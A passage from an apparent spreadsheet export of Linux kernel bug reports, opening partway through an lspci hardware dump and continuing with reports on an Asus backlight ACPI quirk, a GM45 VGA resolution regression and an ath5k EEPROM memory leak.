Computer Corp. Device 1083 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [e0] Vendor Specific Information: Len=0b &lt;?&gt; Kernel modules: intel-agp 00:01.0 PCI bridge: Intel Corporation 82G33/G31/P35/P31 Express PCI Express Root Port (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000a000-0000afff Memory behind bridge: fdc00000-fdcfffff Prefetchable memory behind bridge: 00000000d0000000-00000000dfffffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA+ MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [88] Subsystem: Intel Corporation 82G33/G31/P35/P31 Express PCI Express Root Port Capabilities: [80] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=0 PME- Capabilities: [90] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [a0] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #2, Speed 2.5GT/s, Width x16, ASPM L0s, Latency L0 &lt;256ns, L1 &lt;4us ClockPM- Surprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x16, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise- Slot #32, PowerLimit 75.000W; Interlock- NoCompl+ SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Off, PwrInd On, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet+ LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- Capabilities: [140 v1] Root Complex Link Desc: PortNumber=02 ComponentID=01 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=01 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed19000 Kernel modules: shpchp 00:1a.0 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #4 (rev 02) (prog-if 00 [UHCI]) Subsystem: ABIT Computer Corp. Device 1083 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 16 Region 4: I/O ports at ff00 [size=32] Capabilities: [50] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: uhci_hcd 00:1a.1 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #5 (rev 02) (prog-if 00 [UHCI]) Subsystem: ABIT Computer Corp. Device 1083 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin B routed to IRQ 21 Region 4: I/O ports at fe00 [size=32] Capabilities: [50] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: uhci_hcd 00:1a.2 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #6 (rev 02) (prog-if 00 [UHCI]) Subsystem: ABIT Computer Corp. Device 1083 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin D routed to IRQ 19 Region 4: I/O ports at fd00 [size=32] Capabilities: [50] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: uhci_hcd 00:1a.7 USB Controller: Intel Corporation 82801I (ICH9 Family) USB2 EHCI Controller #2 (rev 02) (prog-if 20 [EHCI]) Subsystem: ABIT Computer Corp. Device 1083 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin C routed to IRQ 18 Region 0: Memory at fdfff000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: ehci_hcd 00:1b.0 Audio device: Intel Corporation 82801I (ICH9 Family) HD Audio Controller (rev 02) Subsystem: ABIT Computer Corp. Device 1083 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 40 Region 0: Memory at fdff8000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [60] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000fee0f00c Data: 4171 Capabilities: [70] Express (v1) Root Complex Integrated Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE- FLReset+ DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #0, Speed unknown, Width x0, ASPM unknown, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed unknown, Width x0, TrErr- Train- SlotClk- DLActive- BWMgmt- ABWMgmt- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- VC1: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=1 ArbSelect=Fixed TC/VC=80 Status: NegoPending- InProgress- Capabilities: [130 v1] Root Complex Link Desc: PortNumber=0f ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c000 Kernel driver in use: HDA Intel Kernel modules: snd-hda-intel 00:1c.0 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 1 (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 I/O behind bridge: 0000d000-0000dfff Memory behind bridge: fd900000-fd9fffff Prefetchable memory behind bridge: 00000000fd800000-00000000fd8fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal+ Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #1, Speed 2.5GT/s, Width x4, ASPM L0s, Latency L0 &lt;1us, L1 &lt;4us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled+ Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x0, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surprise+ Slot #16, PowerLimit 10.000W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet- Interlock- Changed: MRL- PresDet- LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal+ PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [90] Subsystem: Intel Corporation Optiplex 755 Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed+ WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- Capabilities: [180 v1] Root Complex Link Desc: PortNumber=01 ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c000 Kernel modules: shpchp 00:1c.4 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 5 (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 I/O behind bridge: 0000c000-0000cfff Memory behind bridge: fde00000-fdefffff Prefetchable memory behind bridge: 00000000fdd00000-00000000fddfffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal+ Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #5, Speed 2.5GT/s, Width x1, ASPM L0s, Latency L0 &lt;256ns, L1 &lt;4us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surprise+ Slot #20, PowerLimit 10.000W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet+ LinkState+ RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal+ PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [80] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [90] Subsystem: Intel Corporation 82801I (ICH9 Family) PCI Express Port 5 Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed+ WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- Capabilities: [180 v1] Root Complex Link Desc: PortNumber=05 ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c000 Kernel modules: shpchp 00:1d.0 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #1 (rev 02) (prog-if 00 [UHCI]) Subsystem: ABIT Computer Corp. Device 1083 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 23 Region 4: I/O ports at fc00 [size=32] Capabilities: [50] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: uhci_hcd 00:1d.1 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #2 (rev 02) (prog-if 00 [UHCI]) Subsystem: ABIT Computer Corp. Device 1083 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin B routed to IRQ 19 Region 4: I/O ports at fb00 [size=32] Capabilities: [50] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: uhci_hcd 00:1d.2 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #3 (rev 02) (prog-if 00 [UHCI]) Subsystem: ABIT Computer Corp. Device 1083 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin C routed to IRQ 18 Region 4: I/O ports at fa00 [size=32] Capabilities: [50] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: uhci_hcd 00:1d.7 USB Controller: Intel Corporation 82801I (ICH9 Family) USB2 EHCI Controller #1 (rev 02) (prog-if 20 [EHCI]) Subsystem: ABIT Computer Corp. Device 1083 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 23 Region 0: Memory at fdffe000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: ehci_hcd 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev 92) (prog-if 01 [Subtractive decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Bus: primary=00, secondary=04, subordinate=04, sec-latency=32 I/O behind bridge: 0000b000-0000bfff Memory behind bridge: fdb00000-fdbfffff Prefetchable memory behind bridge: 00000000fda00000-00000000fdafffff Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [50] Subsystem: ABIT Computer Corp. Device 1083 00:1f.0 ISA bridge: Intel Corporation 82801IR (ICH9R) LPC Interface Controller (rev 02) Subsystem: ABIT Computer Corp. Device 1083 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [e0] Vendor Specific Information: Len=0c &lt;?&gt; Kernel modules: iTCO_wdt 00:1f.2 IDE interface: Intel Corporation 82801IR/IO/IH (ICH9R/DO/DH) 4 port SATA IDE Controller (rev 02) (prog-if 8f [Master SecP SecO PriP PriO]) Subsystem: ABIT Computer Corp. Device 1083 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 19 Region 0: I/O ports at f900 [size=8] Region 1: I/O ports at f800 [size=4] Region 2: I/O ports at f700 [size=8] Region 3: I/O ports at f600 [size=4] Region 4: I/O ports at f500 [size=16] Region 5: I/O ports at f400 [size=16] Capabilities: [70] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=0 PME- Capabilities: [b0] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: ata_piix 00:1f.3 SMBus: Intel Corporation 82801I (ICH9 Family) SMBus Controller (rev 02) Subsystem: ABIT Computer Corp. Device 1083 Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin B routed to IRQ 11 Region 0: Memory at fdffd000 (64-bit, non-prefetchable) [size=256] Region 4: I/O ports at 0500 [size=32] Kernel modules: i2c-i801 00:1f.5 IDE interface: Intel Corporation 82801I (ICH9 Family) 2 port SATA IDE Controller (rev 02) (prog-if 85 [Master SecO PriO]) Subsystem: ABIT Computer Corp. Device 1083 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 19 Region 0: I/O ports at f200 [size=8] Region 1: I/O ports at f100 [size=4] Region 2: I/O ports at f000 [size=8] Region 3: I/O ports at ef00 [size=4] Region 4: I/O ports at ee00 [size=16] Region 5: I/O ports at ed00 [size=16] Capabilities: [70] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=0 PME- Capabilities: [b0] Vendor Specific Information: Len=06 &lt;?&gt; Kernel driver in use: ata_piix 01:00.0 VGA compatible controller: ATI Technologies Inc Radeon HD 3870 (prog-if 00 [VGA controller]) Subsystem: PC Partner Limited Sapphire Radeon HD 3870 PCIe 2.0 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 41 Region 0: Memory at d0000000 (64-bit, prefetchable) [size=256M] Region 2: Memory at fdce0000 (64-bit, non-prefetchable) [size=64K] Region 4: I/O ports at ae00 [size=256] [virtual] Expansion ROM at fdc00000 [disabled] [size=128K] Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Express (v2) Legacy Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;4us, L1 unlimited ExtTag+ AttnBtn- AttnInd- PwrInd- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x16, ASPM L0s L1, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x16, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- DevCap2: Completion Timeout: Not Supported, TimeoutDis- DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis- LnkCtl2: Target Link Speed: 2.5GT/s, EnterCompliance- SpeedDis-, Selectable De-emphasis: -6dB Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -6dB Capabilities: [a0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000fee0500c Data: 4179 Capabilities: [100 v1] Vendor Specific Information: ID=0001 Rev=1 Len=010 &lt;?&gt; Kernel driver in use: radeon Kernel modules: radeon 01:00.1 Audio device: ATI Technologies Inc Radeon HD 3870 Audio device Subsystem: PC Partner Limited Device aa18 Control: I/O- Mem+ B</t>
  </si>
  <si>
    <t>Asus UL30VT backlight control only works with acpi_osi="Linux" acpi_osi="!Windows 2009"</t>
  </si>
  <si>
    <t>2011-04-04 03:16 UTC</t>
  </si>
  <si>
    <t>2013-02-08 18:31 UTC</t>
  </si>
  <si>
    <t>Created attachment 53362 [details] Asus UL30VT Bios 211 DSDT Asus UL30VT backlight control only works with acpi_osi="Linux" acpi_osi="!Windows 2009". Without these options, I get a desktop notification for the brightness when using the Fn brightness up/down keys, but no change in display brightness. Likewise the sysfs brightness control thinks it's doing it's job when I read and write the file, but there's no change in the display state. Either method causes the display brightness to change when the system is rebooted, as if Linux setup the change, but didn't actually flush it out to hardware.</t>
  </si>
  <si>
    <t>Issues when vga monitor connected</t>
  </si>
  <si>
    <t>78fca1b95837a44983608302e89c7258981be9b3</t>
  </si>
  <si>
    <t>2011-04-04 07:17 UTC</t>
  </si>
  <si>
    <t>2011-04-27 06:16 UTC</t>
  </si>
  <si>
    <t>Created attachment 53372 [details] 2.6.39-rc1 dmesg When i attach an external vga monitor to a GM45 laptop lvds panel is off and external monitor works at max 1024x768 vs its native 1600x1200. IIRC 2.6.38-rc7 was working fine but i don't have it around anymore, 2.6.36 is working fine. Userspace is drm 2.4.23 and video-intel 2.14.0.</t>
  </si>
  <si>
    <t>Memory kcalloc'ed in ath5k_eeprom_convert_pcal_info_*() is not always kfree'd</t>
  </si>
  <si>
    <t>2011-04-05 14:10 UTC</t>
  </si>
  <si>
    <t>2011-04-29 17:55 UTC</t>
  </si>
  <si>
    <t>This problem concerns 'ath5k' driver. When ath5k_hw_init() performs necessary initialization tasks, ath5k_eeprom_init() is called. One of ath5k_eeprom_convert_pcal_info_[5111|5112|2413]() functions is called then, among other things. On my system, it is ath5k_eeprom_convert_pcal_info_2413() but everything also applies to the other two functions. drivers/net/wireless/ath/ath5k/eeprom.c: ath5k_eeprom_convert_pcal_info_2413() allocates several memory blocks in 'for' loops with kcalloc (see the lines 1153, 1176, 1182). It seems unlikely that any of these allocations will fail, the sizes of the memory blocks are rather small. Nevertheless, if one of these allocations fails, the memory blocks allocated in ath5k_eeprom_convert_pcal_info_2413() before will probably never be freed. They could be freed by ath5k_eeprom_free_pcal_info() but this function is not called in this case. Not a critical problem, it seems, but still.</t>
  </si>
  <si>
    <t>2011-04-05 14:34 UTC</t>
  </si>
  <si>
    <t>2011-04-27 19:14 UTC</t>
  </si>
  <si>
    <t>This problem concerns 'ath5k' driver. When ath5k_hw_init() performs necessary initialization tasks, ath5k_eeprom_init() is called. One of ath5k_eeprom_convert_pcal_info_[5111|5112|2413]() functions is called then among other things. On my system, it is ath5k_eeprom_convert_pcal_info_2413() but everything also applies to the other two functions. (drivers/net/wireless/ath/ath5k/eeprom.c) ath5k_eeprom_convert_pcal_info_2413() allocates several memory blocks in 'for' loops with kcalloc (see the lines 1153, 1176, 1182). It seems unlikely that any of these allocations will fail, the sizes of the memory blocks are rather small. Nevertheless, if one of these allocations fails, the memory blocks allocated in ath5k_eeprom_convert_pcal_info_2413() before will probably never be freed. They 